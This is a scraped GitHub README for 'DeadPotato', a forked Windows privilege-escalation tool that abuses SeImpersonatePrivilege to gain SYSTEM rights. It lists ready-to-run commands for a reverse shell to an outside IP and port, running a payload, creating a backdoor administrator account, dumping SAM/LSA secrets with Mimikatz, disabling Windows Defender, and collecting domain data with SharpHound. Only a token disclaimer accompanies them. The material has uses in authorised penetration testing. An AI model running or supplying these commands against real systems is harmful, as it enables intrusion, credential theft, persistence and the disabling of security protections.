Skip to content
forked from lypd0/DeadPotato

DeadPotato is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.

License

Notifications You must be signed in to change notification settings

offsoc/DeadPotato

 
 

Repository files navigation

image

forksBDG starsBDG licenseBDG languageBDG

🚨 Hashdump & SharpHound Modules Now Available! 🚨

❗ Usage of this program under an unauthorized context is strictly forbidden. The author(s) of DeadPotato do not take any responsibility for any harm caused to systems. Use with caution. ❗

C:\Users\lypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITY\SYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

❔ Quick Start - How To Use

The SeImpersonatePrivilege right is enabled in your context? With DeadPotato, it is possible to achieve maximum privileges on the local system.

The tool will attempt to start an elevated process running in the context of the NT AUTHORITY\SYSTEM user by abusing the DCOM's RPCSS flaw in handling OXIDs, allowing unrestricted access over the machine for critical operations to be freely performed.

⚠️ In the following case, the -cmd module is used. Many modules are available for use, such as the -rev IP:PORT for spawning an elevated reverse shell, -newadmin usr:pass for creating a new local Administrator user for persistence, or -mimi sam for dumping SAM hashes.

cmd_GQJhLcT9IH

Verify SeImpersonatePrivilege rights

In order to use DeadPotato, the SeImpersonatePrivilege right must be enabled in the current context. In order to verify this, the whoami /priv command can be executed. If there privilege is disabled, exploitation is not possible in the current context.

C:\Users\lypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

🐚 Getting an Elevated Reverse Shell

cmd_XQASCL7Lz6

🏅 Credits

This Project "DeadPotato" is a tool built on the source code of the masterpiece "GodPotato" by BeichenDream. If you like this project, make sure to also go show support to the original project

BeichenDream, Benjamin DELPY gentilkiwi, BloodHound Developers.

License

This project is licensed under the Apache 2.0 License. Please review the LICENSE file for more details.

Star History Chart

About

DeadPotato is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 100.0%